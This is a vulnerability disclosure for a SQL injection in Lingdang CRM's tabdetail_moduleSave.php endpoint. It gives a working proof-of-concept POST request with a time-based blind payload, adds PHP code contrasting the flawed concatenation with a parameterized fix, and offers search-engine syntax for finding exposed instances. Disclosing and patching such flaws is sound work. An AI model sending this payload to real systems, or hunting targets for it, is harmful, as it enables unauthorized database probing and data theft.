SQL Injection Vulnerability in Lingdang CRM

Title: SQL Injection Vulnerability in Lingdang CRM

Affected Version: Lingdang CRM ≤ V8.6.4.3

Vendor: Shanghai Lingdang Information Technology (www.51mis.com)

Software: Lingdang CRM

Vulnerability Files: /crm/crmapi/erp/tabdetail_moduleSave.php

Description:

There is a SQL injection vulnerability in the system interface tabdetail_moduleSave.php. In the JSON request the interface receives, the getvaluestring field is not parameterized and is concatenated directly into the SQL query. An attacker can perform time-based blind injection with statements such as SELECT IF(1=1, SLEEP(10), 0) to probe the database structure and obtain sensitive information. The vulnerability results from the absence of prepared statements and input validation. It is recommended to fix it as soon as possible.

Proof of Concept:

POST /crm/crmapi/erp/tabdetail_moduleSave.php HTTP/1.1
Host: XX.XX.XX.XX
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36 Edg/135.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close
Content-Type: application/json
Content-Length: 255

{ "module": "Accounts", "datas": { "X": { "accountname": { "crm_fieldvariable": "x.accountname", "getvaluemethod": "SQL", "getvaluestring": "SELECT IF(1=1, SLEEP(10), 0) AND ?", "value": "1" } } } }


When the request succeeds, the database executes SLEEP for 10 seconds, which shows up as a 10-second delay in the page response.
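The concatenation the description refers to, with a parameterized and allowlisted rewrite beside it, as an added PHP illustration that is not Lingdang CRM's own code. The handler and function names, the accounts table and its columns, and the benign getvaluemethod value "field" are assumptions; the request body is constructed to mirror the PoC above, and the snippet needs the pdo_sqlite extension to run stand-alone.

```php
<?php
// Added illustration, not Lingdang CRM's code. Assumes a handler that resolves
// one field of the JSON body to a value by querying the database; the table,
// column and function names are hypothetical. Requires the pdo_sqlite extension.

// Vulnerable shape described in the advisory: the client-controlled
// getvaluestring is spliced into the statement text, so whatever SQL it
// contains runs with the application's database privileges.
function lookupFieldValueVulnerable(PDO $db, array $field)
{
    $sql = 'SELECT ' . $field['getvaluestring'] . ' FROM accounts WHERE id = ' . $field['value'];
    return $db->query($sql)->fetchColumn();
}

// Columns the client may ask for, keyed by the name it is allowed to use.
const ALLOWED_FIELDS = ['accountname' => 'accountname', 'phone' => 'phone'];

// Hardened form: no SQL is accepted from the request at all. The column comes
// from an allowlist and the lookup value is bound as a parameter, so it can
// only ever be compared as data and cannot change the shape of the query.
function lookupFieldValueSafe(PDO $db, array $field)
{
    if (($field['getvaluemethod'] ?? '') === 'SQL') {
        throw new InvalidArgumentException('client-supplied SQL is not accepted');
    }
    $ref = $field['crm_fieldvariable'] ?? '';
    if (!preg_match('/^x\.([a-z_]+)$/', $ref, $m) || !array_key_exists($m[1], ALLOWED_FIELDS)) {
        throw new InvalidArgumentException('unknown field reference');
    }
    $column = ALLOWED_FIELDS[$m[1]];

    $stmt = $db->prepare("SELECT {$column} FROM accounts WHERE id = :id");
    $stmt->bindValue(':id', (int) $field['value'], PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchColumn();
}

// Constructed demo data and a request body with the same shape as the PoC.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE accounts (id INTEGER PRIMARY KEY, accountname TEXT, phone TEXT)');
$db->exec("INSERT INTO accounts VALUES (1, 'Example Co', '000-0000')");

$body = json_decode('{"module":"Accounts","datas":{"X":{"accountname":{'
    . '"crm_fieldvariable":"x.accountname","getvaluemethod":"SQL",'
    . '"getvaluestring":"SELECT IF(1=1, SLEEP(10), 0) AND ?","value":"1"}}}}', true);
$field = $body['datas']['X']['accountname'];

// The hardened handler refuses the request because it carries SQL; a benign
// request for the same field (hypothetical getvaluemethod "field") is served
// from the allowlisted column.
try {
    lookupFieldValueSafe($db, $field);
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), PHP_EOL;
}
$benign = ['crm_fieldvariable' => 'x.accountname', 'getvaluemethod' => 'field', 'value' => '1'];
echo lookupFieldValueSafe($db, $benign), PHP_EOL;
```

The important design point is that the column name is never taken from the request: identifiers cannot be bound as parameters, so they have to be resolved through an allowlist, while the comparison value goes through a bound placeholder. Rejecting any request that carries SQL in getvaluemethod or getvaluestring removes the injection surface entirely rather than trying to filter SLEEP or IF out of it.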

If necessary, I can provide the search syntax of the cyberspace search engine to facilitate the replication of this vulnerability. Looking forward to your reply, thanks.

Screenshots (images not reproduced in this text):

case 1

case 2

case 3